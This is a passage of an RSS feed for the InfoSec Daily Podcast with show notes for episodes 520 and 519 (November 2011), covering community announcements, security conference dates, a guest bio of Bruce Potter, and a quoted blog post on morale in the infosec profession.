<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12th, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/28563447/BSidesDelaware"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/28563447/BSidesDelaware</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Interview with Bruce Potter (@gdead). &nbsp;Bruce is the founder of The Shmoo Group, which is an international organization formed in the late 1990s as a non-profit security think-tank. &nbsp;&nbsp;</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Shmoo Group is comprised of security professionals from around the world who donate their free time and energy to information security research and development. &nbsp;Their projects are well known and respected in the industry, such as </span><a href="http://www.shmoocon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ShmooCon</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Rainbow tables, AirSnort, bluesniff</span><span style="font-size:11pt;font-family:Arial;color:#404040;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">airsnarf, and osiris</span><span style="font-size:11pt;font-family:Arial;color:#404040;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to name a few. &nbsp;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As if that&rsquo;s not enough, Bruce is also the founder and CTO of </span><a href="http://www.pontetec.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Ponte Technologies</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a company focused on advanced IT security technologies. &nbsp;And last but certainly not least he&rsquo;s a cyclist.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-520-interview-with-bruce-potter-gdead/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3122/0/infosec-daily-podcast-episode-520.mp3" length="24078836" type="audio/mpeg" />
		<itunes:duration>0:50:03</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 520 for November 11, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Special Guest: Bruce Potter
	Announcements:
	Brad Smith (t[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 520 for November 11, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Special Guest: Bruce Potter
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	BSides Delaware
	When: November 11-12th, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/28563447/BSidesDelaware
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34; 
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	You don't have a sufficient version of Flash Player to display this animation.
	Interview with Bruce Potter (@gdead). &#160;Bruce is the founder of The Shmoo Group, which is an international organization formed in the late 1990s as a non-profit security think-tank. &#160;&#160;The Shmoo Group is comprised of security professionals from around the world who donate their free time and energy to information security research and development. &#160;Their projects are well known and respected in the industry, such as ShmooCon, Rainbow tables, AirSnort, bluesniff, airsnarf, and osiris, to name a few. &#160;
	As if that&#8217;s not enough, Bruce is also the founder and CTO of Ponte Technologies, a company focused on advanced IT security technologies. &#160;And last but certainly not least he&#8217;s a cyclist.</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 519 &#8211; Infosec Whiners, Rogue Risk Manager, Steve Was Right,  Comcast’s Native IPv6 and 5 iOS Tips</title>
		<link>http://www.isdpodcast.com/episode-519-infosec-whiners-rogue-risk-manager-steve-was-right-comcast%e2%80%99s-native-ipv6-and-5-ios-tips</link>
		<comments>http://www.isdpodcast.com/episode-519-infosec-whiners-rogue-risk-manager-steve-was-right-comcast%e2%80%99s-native-ipv6-and-5-ios-tips#comments</comments>
		<pubDate>Fri, 11 Nov 2011 01:51:19 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3117</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 519 for November 10, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik and Karthik Rangarajan. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<div><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 519 for November 10, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik and Karthik Rangarajan.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12th, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/28563447/BSidesDelaware"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/28563447/BSidesDelaware</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://daveshackleford.com/?p=689"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://daveshackleford.com/?p=689</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&rsquo;m perennially happy. I am almost always in a pretty good mood, despite my inherent sarcasm and less-than-politically-correct approach. But I get the impression that many in infosec are not. Everyone is different, and I don&rsquo;t want to stereotype, but I do run into a lot of gloomy folks. Why is the infosec profession so unhappy in general? I closed out the IANS forum in Chicago today (which ROCKED, by the way, just too much awesomeness in CHI to contain), and Ron Ritchie made some comments that I thought were pretty spot-on in his closing thoughts. He mentioned a few good reasons to be in infosec, and I&rsquo;ll list some below, including his:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reasons infosec rocks:</span></div>
<ul>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Money is good! (Ron)</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We have tons of interesting things to work on! (Ron)</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We bring real value to our organizations! (Ron)</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We can actually detect and prevent crime in some cases!</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We have one hell of a solid career path, in general!</span></li>
</ul>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&rsquo;m sure this all sounds good. High-fives all around! Hmmm. Wait. We&rsquo;ve still got that &ldquo;Sad Panda&rdquo; problem. So there are surely some negative aspects to infosec as well. What are they? Based on my experience as a practitioner, consultant, trainer, and general curmudgeon (albeit a pretty jolly one), a few things I can think of:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reasons infosec sucks:</span></p>
<ul>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">People ignore us, hate us, or perceive us as roadblocks. Or all three.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Infosec never seems to be &ldquo;done&rdquo;, ever. Always an ongoing endeavor.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The landscape in infosec changes so rapidly it&rsquo;s difficult to keep up.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Overall, infosec is &ldquo;hard&rdquo;.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Related to the first point in this list, we may feel &ldquo;at odds&rdquo; with business units and IT organizations.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There&rsquo;s a general sense of &ldquo;futility&rdquo; &ndash; we can&rsquo;t &ldquo;win&rdquo;.</span></li>
<li style="list-style-type:disc;font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Our career paths are wack &ndash; do we really have any respect?</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-519-infosec-whiners-rogue-risk-manager-steve-was-right-comcast%e2%80%99s-native-ipv6-and-5-ios-tips/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3117/0/infosec-daily-podcast-episode-519.mp3" length="19236298" type="audio/mpeg" />
		<itunes:duration>0:40:02</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 519 for November 10, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik and Karthik Rangarajan.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad S[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 519 for November 10, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik and Karthik Rangarajan.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	BSides Delaware
	When: November 11-12th, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/28563447/BSidesDelaware
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source:http://daveshackleford.com/?p=689
	I&#8217;m perennially happy. I am almost always in a pretty good mood, despite my inherent sarcasm and less-than-politically-correct approach. But I get the impression that many in infosec are not. Everyone is different, and I don&#8217;t want to stereotype, but I do run into a lot of gloomy folks. Why is the infosec profession so unhappy in general? I closed out the IANS forum in Chicago today (which ROCKED, by the way, just too much awesomeness in CHI to contain), and Ron Ritchie made some comments that I thought were pretty spot-on in his closing thoughts. He mentioned a few good reasons to be in infosec, and I&#8217;ll list some below, including his:
	Reasons infosec rocks:

Money is good! (Ron)
We have tons of interesting things to work on! (Ron)
We bring real value to our organizations! (Ron)
We can actually detect and prevent crime in some cases!
We have one hell of a solid career path, in general!

	I&#8217;m sure this all sounds good. High-fives all around! Hmmm. Wait. We&#8217;ve still got that &#8220;Sad Panda&#8221; problem. So there are surely some negative aspects to infosec as well. What are they? Based on my experience as a practitioner, consultant, trainer, and general curmudgeon (albeit a pretty jolly one), a few things I can think of:
	Reasons infosec sucks:

